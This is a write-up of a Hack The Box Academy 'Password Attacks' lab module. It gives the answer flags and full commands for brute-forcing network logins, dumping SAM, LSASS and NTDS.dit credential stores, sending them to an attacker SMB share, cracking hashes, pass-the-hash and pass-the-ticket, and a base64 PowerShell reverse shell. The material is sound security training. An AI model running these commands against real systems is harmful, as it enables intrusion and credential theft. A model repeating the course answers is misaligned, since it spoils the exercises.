Password Attacks:

Link to challenge: https://academy.hackthebox.com/module/147

(log in required)
Class: Tier I | Medium | Offensive

Before we begin: throughout the module we will be requested to login to

target Linux machines, and target windows machines.
The credentials will be provided for us by the module.
For Linux, we will use ssh with the command:
ssh <username>@<target-IP>
and then we will be requested to enter the password.
For windows – we will use xfreerdp with the command:
xfreerdp /v:<Target IP> /u:<username> /p:<password>
/dynamic-resolution

Throughout the module, those steps will be referred as ‘login to the

Linux/Windows target machine’.

In our disposal – we are provided by the module with resources folder –

containing ‘password.list’, ‘username.list’ and ‘custom.rule’. unless specified
otherwise, all mentions for username or password wordlists – those lists are
referred as default wordlists.
Remote Password Attacks
Network Services:
Question: Find the user for the WinRM service and crack their password. Then,
when you log in, you will find the flag in a file there. Submit the flag you found
as the answer.
Answer: HTB{That5Novemb3r}
Method: first we need to obtain credentials, we will use crackmapexec, we will
run on the pwnbox the command:
crackmapexec winrm <target-IP> -u username.list -p
password.list | grep '+'
to bruteforce the WinRM service for credentials. We will use the default
wordlists, and grep for the ‘+’ character – indicating successful hit:

We have a hit! john:November

Lets enter to the powershell with its credentials via WinRM service, using ‘evil-
winRM’ tool:
evil-winrm -i <target-IP> -u john -p november

Log in successful, we have a poweshell to john’s user.

We are not told where the flag is, only it is implied that it is somewhere within
john’s user folder. We will look with the powershell command:
Get-ChildItem -Path C:\Users\john -Filter "flag.txt" -
Recurse -Force -ErrorAction SilentlyContinue | Select-Object
-ExpandProperty FullName
The command will look through john’s folder for the file ‘flag.txt’ (including
searching hidden files (‘-Forced’):

We found the flag at john’s Desktop! Lets get the flag with ‘cat’:
cat C:\Users\john\Desktop\flag.txt

Question: Find the user for the SSH service and crack their password. Then,
when you log in, you will find the flag in a file there. Submit the flag you found
as the answer.
Answer: HTB{Let5R0ck1t}
Method: we will use hydra password cracking tool – we will use the command:
hydra -L username.list -P password.list ssh://<target-IP>
to bruteforce the ssh service with the default username and credential lists,
after some bruteforcing we will get:

dennis:rockstar credentials
we will use the command
ssh dennis@<target-IP>
and then we will be prompted for a fingerprint (enter yes) and then prompted
for password – where we enter the password ‘rockstar’:

We are in.
Our default CLI within the target machine is cmd, we will enter ‘powershell’ to
change the CLI to powershell, then I assumed the flag is also in desktop get the
flag directly without ‘searching’ first:
cat Desktop\flag.txt
the command works because our default path is dennis’s home folder:
Question: Find the user for the RDP service and crack their password. Then,
when you log in, you will find the flag in a file there. Submit the flag you found
as the answer.
Answer: HTB{R3m0t3DeskIsw4yT00easy}
Method: the bruteforce command is very similar to the ssh command – also
using hydra:
hydra -L username.list -P password.list rdp://<target-IP>
after a minute or 2:

We get the credentials chris:789456123.

Lets run xfree RDP:
xfreerdp /v:<Target IP> /u:chris /p:789456123 /dynamic-
resolution
we will be propted for confirmation, enter ‘Y’, and we are at chris’s rdp
desktop:

the flag is right here, lets open it:

Question: Find the user for the SMB service and crack their password. Then,
when you log in, you will find the flag in a file there. Submit the flag you found
as the answer.
Answer: HTB{S4ndM4ndB33}
Method: for the SMB bruteforce hydra won’t work, we will use Metasploit
instead – we will execute Metasploit with:
msfconsole
command, then we will enter the settings:
use auxiliary/scanner/smb/smb_login
set user_file username.list
set pass_file password.list
set rhosts <target-IP>

and then:
run

The bruteforce is a it problematic as failed attempts are displayed as well

flooding the terminal, either way we have the credentials: cassie:12345678910
Ok now that we have the credentials – lets obtain the shares list:
crackmapexec smb <target-IP> -u "cassie" -p "12345678910" --
shares
lets enter CASSIE share, and get the flag:
smbclient -U cassie \\\\<target-IP>\\CASSIE
we will be prompted for the password – enter it:

And we are in the smb server, in the smb server CLI: we run
ls
to confirm flag existence:

Then we get the flag to our machine:

get flag.txt

Now the flag is our machine, on the pwnbox terminal - we can confirm with ls,
when confirm – we cat it:
ls flag.txt
cat flag.txt
Password Mutations:
Question: Create a mutated wordlist using the files in the ZIP file under
"Resources" in the top right corner of this section. Use this wordlist to brute
force the password for the user "sam". Once successful, log in with SSH and
submit the contents of the flag.txt file as your answer.
Answer: HTB{P455_Mu7ations}
Method: First we will have to prepare the mutated password list, to be called
‘mut_password.list’ – for that we will require the original ‘password.list’, and
the other file from the resources folder – ‘custom.rule’ to create a mutated
password list – which is basically the process of taking every word within the
password list, and ‘transform’ it to variant more fit to comply with password
policies, for example ‘Yigritte’ → ‘Y1gritt3@’.
‘custom.rule’ is the set of rules to which variants every password will be
mutated to. Of course ‘custom.rule’ may have more than a single rule so the
output password lists with the mutated variants of the original passwords will
contain far more values than the original list.
To mutate our password list we will use the hashcat command:
hashcat --force password.list -r custom.rule --stdout | sort
-u > mut_password.list
and we will get the output file ‘mut_password.list’.
running line count (‘wc -l’) on that file will reveal:

94044 values, brute forcing them all in a single chunk will take far too long.
So what I did is to split the ‘mut_password.list’ to sub-lists based on the
character lengths for each value.
After some trial and error – I will tell you up front that the correct password
has more than 10 characters – so we will create a sub-list of
‘mut_password.list’ – called ‘mut_password2.list’, which will contain only the
values whose length is 10 characters or more. For that we will use the
command:
awk 'length($0) >= 10' mut_password.list >
mut_password2.list
running line count on the sub-mutated list:

Will reveal that there are 55711 values, almost half than the original list’s
length.
However, ssh default brute-force it will still be very slow.
Operating on the assumption that the target user, in this case ‘sam’ is using the
same password for multiple service – we will bruteforce another service, which
the process of bruteforce it is much faster.
Lets check the target runs ‘ftp’ service – port 21:

Good, ‘ftp’ is up and running we will brute force that instead of ‘ssh’ – ftp brute
forcing is much faster.
We will also set high number of threads working on the bruteforce, the default
is 16, we will set the amount of threads to 48:
hydra -l sam -P mut_password2.list ftp://<target-IP> -t 48
we use hydra to bruteforce ‘sam’ password with ‘mutated_password2.list’ –
the mutated password which contains the values of 10 characters long or
more, on ftp service, with 48 threads (64 works too, but in this writeup I did
with 48).
After approximately 15 minutes of bruteforcing:
Ok we have sam’s ftp password, time to check if sam really uses the same
password for all of his services, lets attempt to login to his ssh account with the
password, we will run the command
ssh sam@<target-IP>
and then we will be prompted for the password, (and fingerprint confirmation
– enter ‘yes’), when entered:

.
.

We are in!
Lets run the commands:
pwd
find . -type f -name flag.txt 2>/dev/null
pwd will tell us our present working directory (which will be sam’s working
directory), and the find command will locate the flag somewhere within the
present working directory (denoted as ‘.’), in this case – ‘/home/sam’:

Ok the file is within the ‘smb’ directory.

Lets get the with
cat smb/flag.txt
Password Reuse / Default Passwords:
Question: Use the user's credentials we found in the previous section and find
out the credentials for MySQL. Submit the credentials as the answer. (Format:
<username>:<password>)
Answer: superdba:admin
Method: we need to get a list of default passwords to various services to check
from, such a list can be found here.
We download it, cd our way to the repository directory.
If required – as install the required modules to run the tool
pip3 install -r requirements.txt
*follow the repository README for more detailed instructions. *
Once everything is ready, we run the command:
creds search MySQL

Ok we have several possible options. We will need to check them to see what
credentials takes us in to the mysql.
First we will ssh login to ‘sam’ account via the previous obtained credentials
and the same method.
Once in, we run the command
mysql -u <user> -p<password>
*pay attention there is no space between the ‘-p’ and the password. *
Ok lets test the first three options:
All failed – access denied.

Lets test the fourth option – superdba:admin:

Success! We are in, the MySQL credentials are superdba:admin.

Windows Local Password Attacks
Attacking SAM:
Question: Where is the SAM database located in the Windows registry?
(Format: ****\***)
Answer: HKLM\SAM
Method:
Method 1: In the HTB-Academy Windows Privilege Escalation Writeup I made,
page 124 – I extracted the SAM File from the registry, so the command I run
was:
reg save HKLM\SAM C:\Tools\SAM

Method 2: directly from the section:

Method 3: let’s ask the GPT:

Question: Apply the concepts taught in this section to obtain the password to
the ITbackdoor user account on the target. Submit the clear-text password as
the answer.
Answer: matrix
Method: First, lets RDP to the target Windows machine using the provided
credentials (‘bob’)

We will first have to acquire ‘ITbackdoor’ NTLM hash:

Method 1: We will use similar method I did in HTB-Academy Windows Privilege
Escalation Writeup (page 124) – first on the target machine we will open
powershell as ADMINISTRATOR in ‘C:\Users\bob\Documents’, then we will run
the commands:
reg save HKLM\SAM .\SAM
reg save HKLM\SECURITY .\SECURITY
reg save HKLM\SYSTEM .\SYSTEM

*we can confirm saving with ‘ls’ or looking visually at the directory. *
Now lets transfer the files to our attacking pwnbox using SMB share (in a bit
different way used on the Windows Privilege Escalation writeup equivalent task
(page 124)).
On the pwnbox, we will run the command:
sudo python3 /usr/share/doc/python3-
impacket/examples/smbserver.py -smb2support CompData ./
where ‘./’ is the pwnbox user’s home directory, and ‘CompData’ is the name of
the share:
Now our share is up and running, when there are incoming files, incoming
uploads will be displayed.
On the target machine, we run the commands:
move SAM \\<attacker-IP>\CompData
move SECURITY \\<attacker-IP>\CompData
move SYSTEM \\<attacker-IP>\CompData
the command will move the files from bob’s documents folder (where they
were saved), to the share – where they are essentially uploaded to the attacker
machine:

On the server will be notified (for each uploaded file):

And when done, we can confirm with ‘ls S*’ (look for all files which begin with
‘S’):
Ok all the necessary files are in the attacking pwnbox.
Lets get the credentials dump with ‘secretdump.py’. we will use the command:
python3 /usr/share/doc/python3-
impacket/examples/secretsdump.py -sam SAM -security SECURITY
-system SYSTEM LOCAL

We are looking for the NTLM hash of ‘ITbackdoor’, which is marked at the
screenshot above.

Method 2:
we will use crackmapexec:
crackmapexec smb <target-IP> --local-auth -u bob -p
HTB_@cademy_stdnt! --sam
*the user’s credentials are built in on the command. *:

The ITbackdoor NTLM hash is marked, right at the end.

Ok now that we used 2 different possible methods to obtain the hash, lets
crack it with hashcat.
We will put the obtained hash within a file called ‘hash.txt, We also download
rockyou wordlist for the bruteforcing
Then we run the command:
sudo hashcat -m 1000 hash.txt rockyou.txt

And here is the cracked password of ‘ITbackdoor’

Question: Dump the LSA secrets on the target and discover the credentials
stored. Submit the username and password as the answer. (Format:
username:password, Case-Sensitive)
Answer: frontdesk:Password123
Method: we will use crackmapexec, similar command to the hash dumping:
crackmapexec smb <target-IP> --local-auth -u bob -p
HTB_@cademy_stdnt! --lsa
the difference is here we have the ‘--lsa’ for gettings the credentials:

*
*

And we have the credentials frontdesk:Password123 (the other method

suggested by the section is proabaly using secretdump, however while the
password ‘Password123’ is discovered there, it says ‘unknown user’, yes – extra
steps can be taken to attain the user, but it will not be covered here).
Attacking LSASS:
Question: What is the name of the executable file associated with the Local
Security Authority Process?
Answer: lsass.exe
Method: ‘LSASS is a subsystem of local security authority’

Question: Apply the concepts taught in this section to obtain the password to
the Vendor user account on the target. Submit the clear-text password as the
answer. (Format: Case sensitive)
Answer: Mic@123
Method: first, we will RDP to the target Windows machine with ‘htb-student’
provided credentials.
Now the objective is to get lsass dmp.
We will open the task manager, and on ‘Processes’ tab – we will look for the
process: ‘Local Security Authority Process’

Right click it, and select ‘Create dump file’

When completed – we will get a completion message including the folder the
DMP file was saved to:

Going to the folder:

Here it is.
Lets use the same ‘smb’ method to transfer the file to the attacking pwnbox, as
we did in ‘Attacking SAM’ section (the steps will not be repeated here, but full
details refer to that section), but here are the necessary transfer commands:
Server:
sudo python3 /usr/share/doc/python3-
impacket/examples/smbserver.py -smb2support CompData ./
Client:
move lsass.dmp \\<attacker-IP>\CompData

when the file is transferred – it will be on the attacking pwnbox:

Once we have it, we will use the tool ‘pypykatz’ (python implementation of
‘mimikatz’) to process the dmp.
‘pypykatz’ is not preinstalled in the attacking pwnbox, we will have to install it
with pip:
pip3 install pypykatz

when installed - we will run pypykatz to analyze the lsass data.

we will use the command:
pypykatz lsa minidump lsass.dmp | grep Vendor -B 4
the grep Vendor -B 4 is to display only 4 lines surrounding every occurrences of
the word ‘Vendor’ within the output, so we will not be overflooded t with
irrelevant data:

We have the NTLM hash. Lets put the hash in ‘hash.txt’ and download rockyou
wordlist. Then we run the hashcat command:
sudo hashcat -m 1000 hash.txt rockyou.txt

*Note – don’t bother with the sha1 hash, it won’t work (well for me it didn’t). *
Attacking Active Directory & NTDS.dit:
Question: What is the name of the file stored on a domain controller that
contains the password hashes of all domain accounts? (Format: ****.***)
Answer: NTDS.dit
Method: ‘NT Directory Services (NTDS) is the directory service used with AD to find &
organize network resources. Recall that NTDS.dit file is stored at %systemroot%/ntds on the
domain controllers in a forest. The .dit stands for directory information tree. This is the
primary database file associated with AD and stores all domain usernames, password
hashes, and other critical schema information. If this file can be captured, we could
potentially compromise every account on the domain similar to the technique we covered in
this module's Attacking SAM section. As we practice this technique, consider the importance
of protecting AD and brainstorm a few ways to stop this attack from happening.’

Question: Submit the NT hash associated with the Administrator user from the
example output in the section reading.
Answer: 64f12cddaa88057e06a81b54e73b949b
Method: lets take a look on the section’s example output of NTDS.dit dump:

The NTLM hash is the second hash, so we will take it from the Administrator’s
line.
Question: On an engagement you have gone on several social media sites and
found the Inlanefreight employee names: John Marston IT Director, Carol
Johnson Financial Controller and Jennifer Stapleton Logistics Manager. You
decide to use these names to conduct your password attacks against the target
domain controller. Submit John Marston's credentials as the answer. (Format:
username:password, Case-Sensitive)
Answer: jmarston:P@ssword!
Method: first, we will have to compile a list of possible usernames based on
their names. Our current target is ‘John Marston’. Let’s make a file ‘names.txt’
and but its name in there:

Now, we will download the tool ‘Username Anarchy’ which will do the
compilation for us, we will use the command:
./username-anarchy-master/username-anarchy -i names.txt >
usernames.txt
*The executable is within ‘username-anarchy-master’ folder. *
We will output the results to a file called ‘usernames.txt’.

When finishes – lets observe the ‘usernames.txt’ content:

Ok we have some variaions of ‘John Marston’, where each of those usernames
is a possible candidate for the smb username within the target machine.

We will also require password wordlist, we can use the wordlist ‘fasttrack’
we will run the crackmapexec command
crackmapexec smb <target-IP> -u usernames.txt -p
fasttrack.txt | grep '+'
where the grep ‘+’ is used to suppress display of incorrect credentials that
would otherwise flood the terminal.
The command will bruteforce all the possible names in the ‘usernames.txt’ for
all the possible names in ‘fasttrack.txt’:

Credentials obtained.
*Note – ‘rockyou’ will not work here as it does not contains the correct
password*

Question: Capture the NTDS.dit file and dump the hashes. Use the techniques
taught in this section to crack Jennifer Stapleton's password. Submit her clear-
text password as the answer. (Format: Case-Sensitive)
Answer: Winter2008
Method: ok we need to obtain the NTDS.dit and transfer it to out attacking
pwnbox for cracking.
Method 1: we will have to login using ‘John Marston’ credentials that we had
just obtained, but to what service?
Lets run nmap:
nmap <target-IP> -sV -p 1-7500
to scan the first 7500 ports of our target machine (with extended inspection):
The best candidate is the WinRM service (port 5985)
We will use Evil-WinRM, using the command:
evil-winrm -i <target-IP> -u jmarston -p 'P@ssword!'
using the obtained credentials:

We are in. let’s obtain the credentials – for that we will need not only the
NTDS.dit, but also SYSTEM (yes – ‘C:\Windows\syste32\config\SYSTEM’)
We will have to see what privileges our user has, we will run the commands:
net localgroup
for our local group privileges
or
net user jmarston
for domain privileges
local group privileges output:

Our user belongs to Administrator group.

Domain groups:

*
*

Our user belongs to Domain Admins group within the domain.

Each of the groups (Administrators, Domain Admins) is enough to acquire the
NTDS.dit file and SYSTEM, however it is still good practice to check for both.
In previous sectioned we extracted SYSTEM with administrator powershell –
getting directly from the registry, however in here we will obtain it with the
same method we will obtain NTDS.dit.
Extracting NTDS.dit from the registry as we did to SAM/SECURITY/SYSTEM is
not as simple, we will use another method – shadow copy (basically a snapshot
of the system files or volumes).
First lets make a target folder in ‘C:\’ to receive the file:
mkdir C:\NTDS

Then we run the command:

vssadmin CREATE SHADOW /For=C:

We can observe our created Volume’s Name is ‘HarddiskVolumeShadowCopy1’

Then we take the necessary files to ‘C:\NTDS’, using the commands:
cmd.exe /c copy
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS
\NTDS.dit c:\NTDS\NTDS.dit

cmd.exe /c copy
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\syst
em32\config\SYSTEM c:\NTDS\SYSTEM
(the format is ‘HarddiskVolumeShadowCopyX’)

And here is the copy confirmation:

Now, we will use the usual smb method used in previous section to transfer the
NTDS.dit and SYSTEM from the target machine to the attacking pwnbox:

Server:
sudo python3 /usr/share/doc/python3-
impacket/examples/smbserver.py -smb2support CompData ./
Client:
move C:\NTDS\NTDS.bit \\<attacker-IP>\CompData
move C:\NTDS\NTDS.bit \\<attacker-IP>\CompData

when transferred – the file will be on the attacking pwnbox:

Now time for secretdump analysis of the dump:

secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL
We can safely assume ‘jstapleton’ is the username for ‘Jennifer Stapleton’, and
just there – the second string (marked in the screenshot) is the NTLM hash of
her.

Method 2: lets use crackmapexec, we will run the command:

crackmapexec smb <target-IP> -u jmarston -p P@ssword! --ntds

Method 2 is of course much faster, and in real case I would pick that method as
default, but its important to show both possible methods to obtain ‘Jennifer
Stapleton’ NTLM hash.

Now that we have the hash – time to crack it (using rockyou password list), we
will use the same steps done in previous NTLM hash cracking (using hashcat):
sudo hashcat -m 1000 hash.txt rockyou.txt
Credential Hunting in Windows:
Question: What password does Bob use to connect to the Switches via SSH?
(Format: Case-Sensitive)
Answer: WellConnected123
Method: First, we will RDP to the target windows machine with the credentials
of ‘bob’, provided to us.
In bob’s Desktop:

We see ‘WorkStuff’ folder – lets check that out:

In it wee creds folder:

And in it..
Passwords file – lets open it:

There are 2 passwords inside, the relevant password for this question is the
first one – ‘Switches via SSH’, whose value is ‘WellConnected123’

Question: What is the GitLab access code Bob uses? (Format: Case-Sensitive)
Answer: 3z1ePfGbjWPsTfCsZfjy
Method: looking again at WorkStuff Folder:

Below Creds we have another file – ‘GitlabAccessCodeJustIncase’:

Question: What credentials does Bob use with WinSCP to connect to the file
server? (Format: username:password, Case-Sensitive)
Answer: ubuntu:FSadmin123
Method: We will use the tool ‘LaZagne’ credentials searcher tool.
The tool is not pre-installed in the target machine. we will have to download it
there.
We download the tool to the pwnbox (from the link above), and then we will
have to bring it to the target machine.
On the pwnbox we will initiate python server:
python -m http.server 8080
and on the target machine client we will download the tool with the command:
iwr -uri http://<attacker-IP>:8080/LaZagne.exe -outfile
LaZagne.exe

when the tool is downloaded to the target machine, we will run it with the
command:
start lazagne.exe all
a new terminal will be opened:

Showing the credentials to the WinSCP server.

Question: What is the default password of every newly created Inlanefreight
Domain user account? (Format: Case-Sensitive)
Answer: Inlanefreightisgreat2022
Method: investigating bob’s files further, we can observe in ‘C:\’ a folder called
‘Automations&Scripts’:

This ‘BulkAddADusers’ script looks interesting:

Lets open it:

This active directory user adding script has default hard coded password.
Question: What are the credentials to access the Edge-Router? (Format:
username:password, Case-Sensitive)
Answer: edgeadmin:Edge@dmin123!
Method: in the Desktop we have Visual Studio code:

Lets open it.

The title is immediate giveaway:

EdgeRouterConfigs..
Lets take a look at the content:
Linux Local Password Attacks
Credential Hunting in Linux:
Question: Examine the target and find out the password of the user Will. Then,
submit the password as the answer.
Answer: TUqr7QfLTLhruhVbCP
Method: In this question we are provided with a target Linux machine, but no
credentials for initial login, which has to be obtained for further examination.
However, looking at the hint:

We are told that the possible credentials ‘Kira:LoveYou1’ could be used.

However if we try to ssh the target machine with those credentials:

Access denied.
Lets attempt to mutate the password, just as we did in ‘Password Mutations’
We will put the the original password in a file called ‘password.txt’, and output
the mutated passwords list to mut_password.txt. we will use the command:
hashcat --force password.txt -r custom.rule --stdout | sort
-u > mut_password.txt
and here is the start of the output mutated passwords file:
Now, running the bruteforce with ‘Kira’ username will fail – so lets try to use
small ‘k’ in the name – ‘kira’, we will use the command:
hydra -l kira -P mut_password.txt ssh://<target-IP>
and the password is found:

kira:L0vey0u1!
Ok lets login:
ssh kira@<target-IP>

*
*

We are in. lets start to explore the machine and locate ‘Will’ credentials.
There are plenty of ways to inspect the machine for the credentials, all of which
could be useful, however the method that will obtain the password in this
question is the use of firefox_decrypt - a tool which will extract the data from
Firefox app-data, which contains the passwords (which are encrypted as
default), and decrypts them (with decryption keys and other stored data
required for the decryption within Firefox app-data).
We will download the reposiroty, unzip the folder and go in it with ‘cd’.
Then we will download the tool to the target machine with temporary python
server using the commands:
Server:
python -m http.server 8080

Client:
wget http://<attacker-IP>:8080/firefox_decrypt.py -outfile
firefox_decrypt.py
once downloaded – lets confirm tool existence on the target machine:

Now lets run it, we will use the command:

python3.9 firefox_decrypt.py
yes – the python3.9 matters as the script required execution with python
interpreter version 3.9 (or above):

We are required to select a profile – we select 2:

will’s password is found.

Passwd, Shadow & Opasswd:
Question: Examine the target using the credentials from the user Will and find
out the password of the "root" user. Then, submit the password as the answer.
Answer: J0rd@n5
Method: we will begin with ssh logging to the Linux target machine, using
Will’s credentials obtained in the last section: ‘will:TUqr7QfLTLhruhVbCP’:

*
*

We are in.
To obtain root’s password, we need his hash – which is located at
‘/etc/sahdow’. Lets run:
ls -l /etc/shadow
to see if we even have permissions to read the file (will user has no sudo or any
elevated privileges in the target machine):

The file can be read only by its owner (root), or members of the group
‘shadow’.
Running
groups
will rule out will’s membership in the group ‘shadow’

We can not read ‘/etc/shadow’.

Ok lets try something else – lets run

ls -a
to see all files and directories in will’s home directory, including hidden ones:

‘./backups’ looks interesting:

ls -a .backups/

‘.bak’ extension means backup file – meaning we have a backup files of

‘/etc/passwd’ (users details), and – more importantly – backup of
‘/etc/shadow’ which contains hashes of the users passwords.
We need root’s password, so lets get his hash with the command:
cat .backups/shadow.bak | grep root

$6 means we are dealing with SHA-512 hash algorithm, whose hashcat code is
1800.
Out of the hash – we need the marked (yellow) part:

Lets put it in a file called ‘hash.txt’ within the attacking pwnbox.

We will use the command:
echo
'$6$XePuRx/4eO0WuuPS$a0t5vIuIrBDFx1LyxAozOu.cVaww01u.6dSvct8
AYVVI6ClJmY8ZZuPDP7IoXRJhYz4U8.DJUlilUw2EfqhXg.' > hash.txt
*the quotation marks on the hash are important! *

We will also required the resources folder, containing the password.list and the
custom.rule. in the pwnbox we will run:
hashcat --force password.list -r custom.rule --stdout | sort
-u > mut_password.list
to create the mut_password.list (the same one we made in previous relevant
sections)

when both are ready, we may begin the hashcat cracking with the command
hashcat -m 1800 hash.txt mut_password.list
*-m 1800 is for SHA512*:

After several seconds we will crack the password:

Windows Lateral Movement
Pass the Hash (PtH):
Question: Access the target machine using any Pass-the-Hash tool. Submit the
contents of the file located at C:\pth.txt.
Answer: G3t_4CCE$$_V1@_PTH
Method: first, lets nmap scan the target machine to determine whatOS it has,
and what services it runs:
nmap 10.129.204.23 -sV -p 1-7500

a windows machine, with running WinRM service (port 5985) – which is

suspectable to pass the hash.
Now, the credentials we are provided with: ‘Administrator:
30B3783CE2ABF1AF70F77D0660CF3453’ – they have the hash of
‘Administrator’s password, and not the password itself.
So lets login to WinRM service using ‘evil-WinRM’ tool, with pass the hash. We
will log in with the command:
evil-winrm -i <target-IP> -u Administrator -H
30B3783CE2ABF1AF70F77D0660CF3453
We are in! lets cat the flag!
cat C:\pth.txt

Question: Try to connect via RDP using the Administrator hash. What is the
name of the registry value that must be set to 0 for PTH over RDP to work?
Change the registry key value and connect using the hash with RDP. Submit the
name of the registry value name as the answer.
Answer: DisableRestrictedAdmin
Method: from the section guide:
c:\tools> reg add HKLM\System\CurrentControlSet\Control\Lsa
/t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
the above command sets ‘DisableRestrictedAdmin’ registry value to 0.

*both commands and screen were directly taken from the section guide,
regarding the correct registry value that has to be set to 0 in order to enable
RDP. *
Question: Connect via RDP and use Mimikatz located in c:\tools to extract the
hashes presented in the current session. What is the NTLM/RC4 hash of David's
account?
Answer: c39f2beb3d2ec06a62cb887fb391dee0
Method: First lets try to RDP to the target machine without setting
‘DisableRestrictedAdmin’ value to 0, we will use the command:
xfreerdp /v:<target-IP> /u:Administrator
/pth:30B3783CE2ABF1AF70F77D0660CF3453 /dynamic-resolution
we will get this error message:

Ok lets evil-WinRM to the machine, set the ‘DisableRestrictedAdmin’ to 0 (with

the command from the previous question), and try RDP again:

Now lets try to RDP again (using the same RDP command):

And here we are!

Ok we are told we have mimikatz in ‘C:\tools’
We will open cmd AS ADMINISTRATOR, and run:
.\mimikatz.exe
And we are on mimikatz CLI

In it, we run the miimikatz commands:

privilege::debug
sekurlsa::logonpasswords

somewhere within the results we will find David details and his NTLM hash:
Question: Using David's hash, perform a Pass the Hash attack to connect to the
shared folder \\DC01\david and read the file david.txt.
Answer: D3V1d_Fl5g_is_Her3
Method: open cmd on ‘C:\tools’, and run mimikatz command with the hash of
David obtained in the last question:
.\mimikatz.exe privilege::debug "sekurlsa::pth /user:david
/rc4:c39f2beb3d2ec06a62cb887fb391dee0
/domain:inlanefreight.htb /run:cmd.exe" exit

When we run the command, a new cmd terminal will be opened, lets run in the
new terminal:
dir \\dc01\david

There is a file of ‘david.txt’ – that is our flag.

Lets get it with the command:
type \\dc01\david\david.txt
Question: Using Julio's hash, perform a Pass the Hash attack to connect to the
shared folder \\DC01\julio and read the file julio.txt.
Answer: JuL1()_SH@re_fl@g
Method: we will perform the exact same procedure of the previous question,
except: a. we replace ‘david’ with ‘julio’; b. julio hash is provided for us by the
section, either way – the procedure will be shown in full:
*Note before we begin: in this answer I used capital letter hash (instead of
small letters used in previous question), both formats work. *
open cmd on ‘C:\tools’, and run mimikatz command with the provided hash of
Julio (from the section) with the commands:
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio
/rc4:64F12CDDAA88057E06A81B54E73B949B
/domain:inlanefreight.htb /run:cmd.exe" exit
*the hash of Julio is already provided for us in the section. *
When we run the command, a new cmd terminal will be opened, lets run:
dir \\dc01\julio

There is a file of ‘julio.txt’ – that is our flag.

Lets get it with the command:
type \\dc01\julio\julio.txt
Question: Using Julio's hash, perform a Pass the Hash attack, launch a
PowerShell console and import Invoke-TheHash to create a reverse shell to the
machine you are connected via RDP (the target machine, DC01, can only
connect to MS01). Use the tool nc.exe located in c:\tools to listen for the
reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
Answer: JuL1()_N3w_fl@g
Method: first let’s establish our environment: we have the pwnbox attacking
machine, we have the target machine ‘MS01’:

That we RDP connected to from the pwnbox, it has interface faced to us (the
pwnbox), and another one faced to a second network.
And there is ‘DC01’ machine that is in the same second network with ‘MS01’,
and we can’t directly connect with from the pwnbox (as it is 2 different
networks)
It is from ‘DC01’ we obtained the flags in the previous 2 questions.

Now that is established, in the tools folder there is a folder of ‘Invoke-TheHash’

We will open 2 powershell terminals, one within that folder – we will call it is
terminal 1, and one in ‘C:\tools’, where – as can it be observed in the
screenshot, there is also ‘nc.exe’ netcat – we will call that terminal 2.
In terminal 2 we will run netcat listener (port 4444), with the command:
.\nc.exe -lvnp 4444

Now to terminal 1, before we create the reverse shellpayload, we will need the
MS01 IP, run
ipconfig

Now as established above, MS01 has 2 interfaces, we need the interface of the
network with the ‘DC01’, that would be Ethernet1 interface, therefore the
attacker IP is ‘172.16.1.5’.
Time to create the reverse shell payload, we will go to
https://www.revshells.com/, and create the payload according those
specifications:

The IP is the secondary network attacker IP (MS01 IP), and the port 4444
The reverse shellpayload will be at format of ‘PowerShell #3 (Base64)’ –
Windows OS

Now to the terminal 1 - we will run the command:

Import-Module .\Invoke-TheHash.psd1
To import the module.
Then we run the command
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -
Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -
Command "powershell -e <base64 payload>"
Where the <base64 payload> is the same payload from the screenshot above

We will get on terminal 1 ‘Command executed’ with process ID on DC01.

And on terminal 2:

We got a connection.
Lets confirm our identity (make sure we are indeed ‘julio’) with the command
‘whoami’, our hostname (DC01) and then cat the flag (‘cat C:\julio\flag.txt’):
Question - Optional: Optional: John is a member of Remote Management
Users for MS01. Try to connect to MS01 using john's account hash with
impacket. What's the result? What happen if you use evil-winrm?. Mark DONE
when finish.
Answer: DONE
Method: going back to the mimikatz credentials obtained on question 3, we
can observe john’s credentials:

*Note – in question 3 I used cmd, in here powershell, it doesn’t matters, the

command are the same commands. *
His NTLM hash is ‘c4b0e1b10c7ce2c4723b4e2407ef81a2’.
Now that we know the hash, lets try the impacket, lets start with ‘psexec’ used
in the section guide. we will run the command:
impacket-psexec john@<target-IP> -hashes
:c4b0e1b10c7ce2c4723b4e2407ef81a2
The shares are not writables, access denied.
Lets try another impacket tool – wmiexec:
wmiexec.py john@<target-IP> -hashes
:c4b0e1b10c7ce2c4723b4e2407ef81a2

Again, no luck.
*other impacket tools suggested by the section’s guide similarly didn’t work. *

Now, lets try the evil-WinRM, we will use the command

evil-winrm -i <target-IP> -u john -H
c4b0e1b10c7ce2c4723b4e2407ef81a2

We are in. evil-winRM works.

Pass the Ticket (PtT) from Windows:
Question: Connect to the target machine using RDP and the provided creds.
Export all tickets present on the computer. How many users TGT did you
collect?
Answer: 3
Method: First, we will RDP login to the target windows machine using the
provided Administrator credentials (in this particular case the password is
‘AnotherC0mpl3xP4$$’ so its very important to add quotation marks in the
xfreerdp command).
Lets open powershell in ‘C:\tools’ where we have mimikatz provided for us.
Lets run it with:
.\mimikatz.exe
We will be opened to mimikatz CLI, where we will run:
privilege::debug
sekurlsa::tickets /export
the powershell terminal will be full of all of the tickets data, but more
importantly to our objective – on the ‘C:\tools’ folder itself:

We will have the exported files. Now we need to deduce the amount of user
TGT collected.
We will see that the tgt files has in their names the word ‘krbtgt’ (Kerberos
ticket granting ticket). And to those files there are either before the ‘krbtgt’
part – the hostname itself (MS01) succeeding with ‘$’, separated from the
‘krbtgt’ part with ‘@’, or the username itself, also separated from the ‘krbtgt’
with ‘@’.
What does it means – the part of ‘MS01$@krbtgt’ is not counted (as it is not
user).
But ‘<user>@krbtgt’ is counted.
So on the powershell on ‘C:\tools’ directory’, we run this command:
(Get-ChildItem -File | Where-Object { $_.Name -like
'*@krbtgt*' -and $_.Name -notmatch '\$@krbtgt' }).Count
The command will count all the files with has the occurrences of ‘@krbtgt’,
however excluding ‘$@krbtgt’:

*here is the section guide explanation about the files format regarding user’s
tgt: ‘The tickets that end with $ correspond to the computer account, which needs a ticket to
interact with the Active Directory. User tickets have the user's name, followed by an @ that
separates the service name and the domain, for example: [randomvalue]-username@service-
domain.local.kirbi.’. *

